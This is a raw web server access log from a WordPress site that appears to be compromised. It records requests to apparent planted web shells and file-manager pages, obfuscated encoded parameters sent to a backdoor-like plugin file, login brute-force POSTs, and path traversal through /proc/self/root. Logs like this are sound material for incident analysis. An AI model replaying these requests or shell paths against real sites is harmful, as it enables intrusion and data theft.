57.141.18.27 57.141.18.27 - - [20/Mar/2026:00:52:39 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/style-engine.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16384 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.85 57.141.18.85 - - [20/Mar/2026:00:52:41 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-block-parser-frame.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 404 196 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.59 57.141.18.59 - - [20/Mar/2026:00:52:41 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-paused-extensions-storage.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16384 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
80.97.160.166 - - [20/Mar/2026:00:52:38 -0300] "GET /wp-content/themes/twentytwentyfive/assets/css/audits/wp-login.php HTTP/1.1" 200 12 "https://bandeirantesbombas.com.br/wp-content/themes/twentytwentyfive/assets/css/audits/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.30.215.34 - - [20/Mar/2026:00:52:43 -0300] "GET /wp-content/js11e544/index.php HTTP/1.1" 500 - "https://bandeirantesbombas.com.br/wp-content/js11e544/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
80.97.160.166 - - [20/Mar/2026:00:52:46 -0300] "GET /mah.php HTTP/1.1" 200 381 "https://bandeirantesbombas.com.br/mah.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.244.43 - - [20/Mar/2026:00:52:48 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
80.97.160.166 - - [20/Mar/2026:00:52:49 -0300] "GET /plugins.php HTTP/1.1" 200 381 "https://bandeirantesbombas.com.br/plugins.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
80.97.160.166 - - [20/Mar/2026:00:52:52 -0300] "POST /plugins.php HTTP/1.1" 200 28528 "https://bandeirantesbombas.com.br/plugins.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [20/Mar/2026:00:48:05 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323035322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937383435322q6434626239666232353165626432376362613530333163396131633237663036222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
80.97.160.166 - - [20/Mar/2026:00:53:12 -0300] "POST /plugins.php HTTP/1.1" 200 28580 "https://bandeirantesbombas.com.br/plugins.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [20/Mar/2026:00:48:55 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323130372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937383530372q3162313163633164353561326266356137653562616336636264356436623165222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
69.30.215.34 - - [20/Mar/2026:00:52:28 -0300] "GET /wp-content/pl294f89/edit.php HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/pl294f89/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.30.215.34 - - [20/Mar/2026:00:52:46 -0300] "GET /wp-content/js11e544/index.php HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-content/js11e544/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [20/Mar/2026:00:49:57 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323135372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937383535372q6664623165663662326632633730306362366235363662663230356161386230222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:00:50:54 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323232302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937383632302q6535656633613431373862623439303730653532636139383766383231323866222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:00:51:37 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323237362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937383637362q3533333838653063626637383338363233633333623035383434343736346430222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
195.201.165.118 - - [20/Mar/2026:00:56:58 -0300] "GET /wp-login.php HTTP/1.1" 200 75949 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MASEJS; rv:11.0) like Gecko"
195.201.165.118 - - [20/Mar/2026:00:57:00 -0300] "POST /wp-login.php HTTP/1.1" 200 75949 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MASEJS; rv:11.0) like Gecko"
179.188.53.243 - - [20/Mar/2026:00:52:15 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323331392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937383731392q3633396665356238643837656366643436333738386239313432613939623936222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:00:52:37 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323335372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937383735372q6433346361306639643736346630333438373431353631323338303863386437222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
74.7.244.43 - - [20/Mar/2026:00:58:18 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
57.141.18.9 57.141.18.9 - - [20/Mar/2026:00:58:18 -0300] "GET /shop/petuarista/brachium012167248728.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/block-template-utils.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.36 57.141.18.36 - - [20/Mar/2026:00:58:20 -0300] "GET /shop/emball/turks011979332450.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/assets/script-modules-packages.min.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/assets HTTP/1.1" 200 15385 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.57 57.141.18.57 - - [20/Mar/2026:00:58:25 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/site-icon-rtl.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
209.141.49.67 - - [20/Mar/2026:00:58:48 -0300] "GET /wp-login.php HTTP/1.1" 200 75949 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4"
179.188.53.243 - - [20/Mar/2026:00:53:55 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323338302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937383738302q6636396132373733323331643439306363383566366366383934373332336138222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:00:55:05 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323435392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937383835392q3230343238336466646136353366656538306565653063353830363139613364222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:00:56:32 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323533302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937383933302q3538613932363461323938343937626563616432333035643830386362313738222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:00:57:15 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323631362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393031362q6135386533616339303238656561373166333333373336623233666131313435222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:00:58:16 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323635372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393035372q3138363134626437393061613565623634643138666130633632353934646638222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:00:58:55 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323731382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393131382q3266663236363762623065663136333763663263316662326661366638623763222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
123.30.109.8 - - [20/Mar/2026:01:03:57 -0300] "GET /wp-login.php HTTP/1.1" 200 75949 "-" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
123.30.109.8 - - [20/Mar/2026:01:03:59 -0300] "POST /wp-login.php HTTP/1.1" 200 75949 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
66.249.74.169 - - [20/Mar/2026:01:04:11 -0300] "GET /shop/refuse/flimsy012623374537.phtml HTTP/1.1" 200 214365 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.241.31 - - [20/Mar/2026:01:04:25 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/sbin HTTP/1.1" 200 877024 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [20/Mar/2026:01:04:26 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/tuned/virtual-guest HTTP/1.1" 200 19611 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/tuned" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
50.6.224.234 - - [20/Mar/2026:01:04:55 -0300] "GET /wp-login.php HTTP/1.1" 200 75949 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko"
50.6.224.234 - - [20/Mar/2026:01:04:57 -0300] "POST /wp-login.php HTTP/1.1" 200 75949 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko"
179.188.53.243 - - [20/Mar/2026:01:00:07 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323735372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393135372q6439663033393463666338303631613534656266636566643030356630396133222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
66.249.74.169 - - [20/Mar/2026:01:05:18 -0300] "GET /shop/jacks/spinozist012719582199.phtml HTTP/1.1" 200 206750 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [20/Mar/2026:01:01:21 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323833302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393233302q6438373830356361663037366135643235663064396630356331653335633531222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:02:05 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323930352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393330352q6261623866666663643334343266663434653832623865333830623332303565222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
66.249.74.169 - - [20/Mar/2026:01:07:19 -0300] "GET /shop/swimming/haemopis011846585889.phtml HTTP/1.1" 200 208263 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.18.1 57.141.18.1 - - [20/Mar/2026:01:07:32 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-phpmailer.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 13884 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.82 57.141.18.82 - - [20/Mar/2026:01:07:34 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-recovery-mode-email-service.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.243.128 - - [20/Mar/2026:01:07:32 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/libexec/man-db HTTP/1.1" 200 21241 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/libexec" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
57.141.18.17 57.141.18.17 - - [20/Mar/2026:01:07:37 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/comment-template.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.51 57.141.18.51 - - [20/Mar/2026:01:07:39 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/user.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.14 57.141.18.14 - - [20/Mar/2026:01:07:41 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/session.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 13470 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.19 57.141.18.19 - - [20/Mar/2026:01:08:10 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-text-diff-renderer-inline.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 14248 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
103.154.176.224 - - [20/Mar/2026:01:08:11 -0300] "GET /wp-login.php HTTP/1.1" 200 75949 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0"
